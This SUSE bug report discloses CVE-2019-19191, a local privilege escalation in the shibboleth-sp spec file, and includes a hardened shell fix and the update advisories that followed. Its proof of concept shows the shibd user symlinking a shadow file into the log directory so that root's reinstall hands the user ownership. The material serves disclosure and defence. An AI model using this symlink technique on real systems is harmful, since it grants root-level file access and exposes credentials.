Bugzilla – Bug 1157471
VUL-0: CVE-2019-19191: shibboleth-sp: Local privilege escalation from shibd to root in upstream spec file
Last modified: 2020-12-02 14:15:16 UTC
Spec file lines 195-196:

    # Fix ownership of log files (even on new installs, if they're left from an older one).
    chown %{runuser}:%{runuser} %{_localstatedir}/log/%{realname}/* 2>/dev/null || :

This allows shibd to escalate to root.

POC:

    sh-5.0$ id
    uid=157(shibd) gid=443(shibd) groups=443(shibd)
    sh-5.0$ pwd
    /var/log/shibboleth
    sh-5.0$ ls -lah /test
    total 12K
    drwxr-xr-x  2 root root 4.0K Nov 20 13:51 .
    drwxr-xr-x 23 root root 4.0K Oct 25 11:01 ..
    -rw-r-----  3 root root 1.2K Oct 25 13:20 shadow
    sh-5.0$ ln -s /test/shadow

as root:

    zypper in -f shibboleth-sp

    sh-5.0$ ls -lah /test
    total 12K
    drwxr-xr-x  2 root root  4.0K Nov 20 13:51 .
    drwxr-xr-x 23 root root  4.0K Oct 25 11:01 ..
    -rw-r-----  3 shibd shibd 1.2K Oct 25 13:20 shadow

As this is in the upstream spec file we'll not assign a CVE. I'll file an upstream report and ask MITRE for a CVE.
Upstream issue: https://issues.shibboleth.net/jira/browse/SSPCPP-874
CVE-2019-19191 was assigned to this issue
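The root cause in the report above is that chown follows symbolic links, so a glob over a directory writable by the unprivileged service user lets that user redirect the ownership change to any file on the system. The following is an added example, not code from the bug report, the SUSE package or the upstream shibboleth-sp spec file: a POSIX sh helper that performs the same "fix ownership of log files" step but skips symlinks and non-regular files instead of following them. The function names, the owner argument and the directory layout in the usage are assumptions for illustration; the `chown` call is the same one the spec file used, only applied per regular file.

```shell
#!/bin/sh
# Added example (not from the bug report or the shibboleth-sp spec file).
#
# Vulnerable pattern from the report (follows symlinks planted by the service user):
#   chown shibd:shibd /var/log/shibboleth/* 2>/dev/null || :
#
# Hardened replacement: only regular files that are direct children of the
# directory are chowned; symlinks are reported and left untouched.

# unsafe_links DIR
# Prints every symlink directly inside DIR (one per line), nothing if none.
unsafe_links() {
    dir="$1"
    for f in "$dir"/*; do
        [ -L "$f" ] && printf '%s\n' "$f"
    done
    return 0
}

# safe_chown_dir USER:GROUP DIR
# chown every regular file directly inside DIR, skipping symlinks and
# anything else (sockets, subdirectories). Returns 0 when all regular files
# were chowned and no symlink was seen, 1 when a symlink was skipped or a
# chown failed, so a packaging scriptlet can log the anomaly.
safe_chown_dir() {
    owner="$1"; dir="$2"; rc=0
    for f in "$dir"/*; do
        # An unexpanded glob in an empty directory yields the literal "DIR/*".
        [ -e "$f" ] || [ -L "$f" ] || continue
        if [ -L "$f" ]; then
            # This is exactly the entry the PoC plants: skip it, never follow it.
            echo "safe_chown_dir: skipping symlink $f -> $(readlink "$f")" >&2
            rc=1
            continue
        fi
        [ -f "$f" ] || continue
        chown "$owner" "$f" || rc=1
    done
    return "$rc"
}

# Usage (assumed paths; run as the account that owns the log directory):
#   safe_chown_dir shibd:shibd /var/log/shibboleth || logger "shibboleth log dir contains symlinks"
```

Two alternatives with the same effect are `chown -h`, which POSIX defines as changing the ownership of the link itself rather than its target, and `find DIR -maxdepth 1 -type f -exec chown USER:GROUP {} +`, which never matches symlinks at all; either is preferable to a bare glob when the directory is writable by the account whose privileges the ownership change would hand over.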
SUSE-SU-2019:3386-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1157471
CVE References: CVE-2019-19191
Sources used:
    SUSE Linux Enterprise Module for Server Applications 15-SP1 (src): shibboleth-sp-2.6.1-3.3.1
    SUSE Linux Enterprise Module for Server Applications 15 (src): shibboleth-sp-2.6.1-3.3.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
openSUSE-SU-2020:0020-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1157471
CVE References: CVE-2019-19191
Sources used:
    openSUSE Leap 15.1 (src): shibboleth-sp-2.6.1-lp151.3.3.1
SUSE-SU-2020:0115-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1157471
CVE References: CVE-2019-19191
Sources used:
    SUSE OpenStack Cloud Crowbar 8 (src): shibboleth-sp-2.5.5-6.6.1
    SUSE OpenStack Cloud 8 (src): shibboleth-sp-2.5.5-6.6.1
    SUSE OpenStack Cloud 7 (src): shibboleth-sp-2.5.5-6.6.1
    SUSE Linux Enterprise Software Development Kit 12-SP5 (src): shibboleth-sp-2.5.5-6.6.1
    SUSE Linux Enterprise Software Development Kit 12-SP4 (src): shibboleth-sp-2.5.5-6.6.1
    SUSE Linux Enterprise Server for SAP 12-SP3 (src): shibboleth-sp-2.5.5-6.6.1
    SUSE Linux Enterprise Server for SAP 12-SP2 (src): shibboleth-sp-2.5.5-6.6.1
    SUSE Linux Enterprise Server for SAP 12-SP1 (src): shibboleth-sp-2.5.5-6.6.1
    SUSE Linux Enterprise Server 12-SP5 (src): shibboleth-sp-2.5.5-6.6.1
    SUSE Linux Enterprise Server 12-SP4 (src): shibboleth-sp-2.5.5-6.6.1
    SUSE Linux Enterprise Server 12-SP3-LTSS (src): shibboleth-sp-2.5.5-6.6.1
    SUSE Linux Enterprise Server 12-SP3-BCL (src): shibboleth-sp-2.5.5-6.6.1
    SUSE Linux Enterprise Server 12-SP2-LTSS (src): shibboleth-sp-2.5.5-6.6.1
    SUSE Linux Enterprise Server 12-SP2-BCL (src): shibboleth-sp-2.5.5-6.6.1
    SUSE Linux Enterprise Server 12-SP1-LTSS (src): shibboleth-sp-2.5.5-6.6.1
    SUSE Enterprise Storage 5 (src): shibboleth-sp-2.5.5-6.6.1
    HPE Helion Openstack 8 (src): shibboleth-sp-2.5.5-6.6.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Done